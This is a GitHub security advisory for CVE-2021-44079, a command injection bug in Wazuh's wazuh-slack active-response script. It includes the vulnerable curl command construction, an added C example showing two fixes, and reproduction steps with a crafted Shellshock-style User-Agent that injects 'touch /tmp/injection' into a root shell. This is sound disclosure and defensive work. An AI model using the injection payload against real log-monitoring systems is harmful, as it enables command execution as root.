
CVE-2021-44079: Active response tools allow arbitrary code execution · Issue #10858 · wazuh/wazuh

In the wazuh-slack active response script in Wazuh before 4.2.5, untrusted user agents are passed to a curl command line, potentially resulting in remote code execution.


| Wazuh version | Component | Install type | Install method | Platform | Fix |
|---|---|---|---|---|---|
| 4.2.0 | Active-response script | Manager/Agent | Packages | CentOS 7 | #10809 |

This issue was reported by @rk700.

We found a command injection bug in the active-response script wazuh-slack.

The alert JSON data is put in the shell command line as the POST body for curl:

```c
snprintf(system_command, OS_MAXSTR -1, "curl -H \"Accept: application/json\" -H \"Content-Type: application/json\" -d '%s' %s", output_str, site_url);
```

However, the raw log line, which can be partially controlled by an attacker, is also included in the JSON data. A single quote in the JSON is not escaped and can therefore be used to truncate the command:

```sh
-d '<json data that could be partially controlled>'
```
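The following is an added example, not code from the Wazuh project or from the reporter. It reproduces the vulnerable pattern above in a small C program (a `vulnerable_build` function that interpolates the JSON body into a single-quoted shell argument), shows with a constructed payload that a single quote in the payload leaves the shell quoting unbalanced, and then gives the two standard fixes: a `shell_single_quote` helper that quotes arbitrary input for POSIX sh, and a `build_curl_argv` helper that avoids the shell entirely by passing the body as one `argv` element for `execvp()`/`posix_spawnp()`. The function names, the sample JSON and the `127.0.0.1:8080` endpoint are all assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CMD_MAX 4096

/* Vulnerable pattern (rewritten from the report, kept only to show the
 * problem): the JSON body is interpolated straight into a shell command
 * line inside single quotes. */
int vulnerable_build(char *out, size_t n, const char *json, const char *url)
{
    return snprintf(out, n,
        "curl -H \"Accept: application/json\" "
        "-H \"Content-Type: application/json\" -d '%s' %s", json, url);
}

/* Count single-quote characters. In a command built by vulnerable_build,
 * an odd total means the shell's quoting is unbalanced; any quote coming
 * from the payload changes where the -d argument ends. */
size_t count_single_quotes(const char *s)
{
    size_t n = 0;
    for (; *s; s++)
        if (*s == '\'')
            n++;
    return n;
}

/* Fix 1: quote an arbitrary string for POSIX sh. Inside '...' the shell
 * interprets nothing except the closing quote, so each ' in the input is
 * rewritten as '\'' (close, escaped quote, reopen). Returns a malloc'd
 * string the caller frees, or NULL on allocation failure. */
char *shell_single_quote(const char *s)
{
    size_t len = strlen(s), quotes = count_single_quotes(s);
    char *out = malloc(len + 3 * quotes + 3);   /* +3 per quote, wrap, NUL */
    char *p = out;
    if (!out)
        return NULL;
    *p++ = '\'';
    for (; *s; s++) {
        if (*s == '\'') {
            memcpy(p, "'\\''", 4);
            p += 4;
        } else {
            *p++ = *s;
        }
    }
    *p++ = '\'';
    *p = '\0';
    return out;
}

/* Fix 2 (preferable): do not go through a shell at all. Fill an argv
 * vector for execvp()/posix_spawnp(); the JSON is then one argument no
 * matter which characters it contains. Returns argc, or -1 if the vector
 * is too small for the 8 entries plus the NULL terminator. */
int build_curl_argv(const char *json, const char *url,
                    const char **argv, size_t cap)
{
    const char *fixed[] = { "curl", "-H", "Accept: application/json",
                            "-H", "Content-Type: application/json", "-d" };
    size_t nfixed = sizeof fixed / sizeof fixed[0];
    if (cap < nfixed + 3)
        return -1;
    for (size_t i = 0; i < nfixed; i++)
        argv[i] = fixed[i];
    argv[nfixed] = json;        /* the whole body, unparsed by any shell */
    argv[nfixed + 1] = url;
    argv[nfixed + 2] = NULL;
    return (int)(nfixed + 2);
}

int main(void)
{
    /* Constructed sample: a log fragment carrying a single quote, as an
     * attacker-controlled User-Agent would. */
    const char *json = "{\"text\":\"UA: x' ; id #\"}";
    const char *url = "http://127.0.0.1:8080/test";   /* placeholder endpoint */
    char cmd[CMD_MAX];
    const char *argv[16];

    vulnerable_build(cmd, sizeof cmd, json, url);
    printf("vulnerable command: %s\n", cmd);
    printf("single quotes in it: %zu (odd => quoting broken)\n",
           count_single_quotes(cmd));

    char *q = shell_single_quote(json);
    printf("safely quoted body: %s\n", q);
    free(q);

    int argc = build_curl_argv(json, url, argv, 16);
    printf("argv without a shell: %d entries, body is argv[6]\n", argc);
    return 0;
}
```

The `argv` approach is the one to prefer: quoting for the shell is only correct when every interpolated value is routed through the helper, whereas a direct `exec` has no quoting layer for a value to escape from.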

Steps to reproduce are as follows.

First, we add the wazuh-slack active-response in the config:

```xml
<command>
  <name>wazuh-slack</name>
  <executable>wazuh-slack</executable>
  <!-- an echo server for debug -->
  <extra_args>http://192.168.1.95:8080/test</extra_args>
</command>

<active-response>
  <disabled>no</disabled>
  <command>wazuh-slack</command>
  <location>server</location>
  <level>6</level>
</active-response>
```

Then we set up a web server on the client machine and send a request with a crafted User-Agent:

```sh
curl -I 192.168.1.96/1.html -A "() { :;};ls ' 192.168.1.95:8080;touch /tmp/injection;echo '"
```

The Shellshock PoC triggers an alert, and the crafted User-Agent value, which is contained in the web server's access.log, is also included in the command line as follows:

```sh
curl -H "Accept: application/json" -H "Content-Type: application/json" -d '{"attachments":[{"color":"danger","pretext":"WAZUH Alert","title":"Shellshock attack detected","text":"192.168.1.96 - - [04/Nov/2021:12:53:56 +0800] \"GET /1.html HTTP/1.1\" 200 5 \"-\" \"() { :;};ls ' 192.168.1.95:8080;touch /tmp/injection;echo '\"","fields":[{"title":"Agent","value":"(001) - hids_client"},{"title":"Location","value":"/var/log/apache2/access.log"},{"title":"Rule ID","value":"31168 (level 15)"}],"ts":"1636001638.913845"}]}' http://192.168.1.95:8080/test
```

Here we use the single quote to jump out of `-d '<json data>'` and inject the command `touch /tmp/injection` with semicolons. We can verify this on the server where wazuh-slack runs (the wazuh-manager machine in this case, since we set the location to `server` in the active-response config):

```
root@ubuntu:~# ls -l /tmp/injection
-rw-r--r-- 1 root ossec 0 Nov  4 17:19 /tmp/injection
```

Special thanks to @rk700 for detecting and reporting this issue to the team.
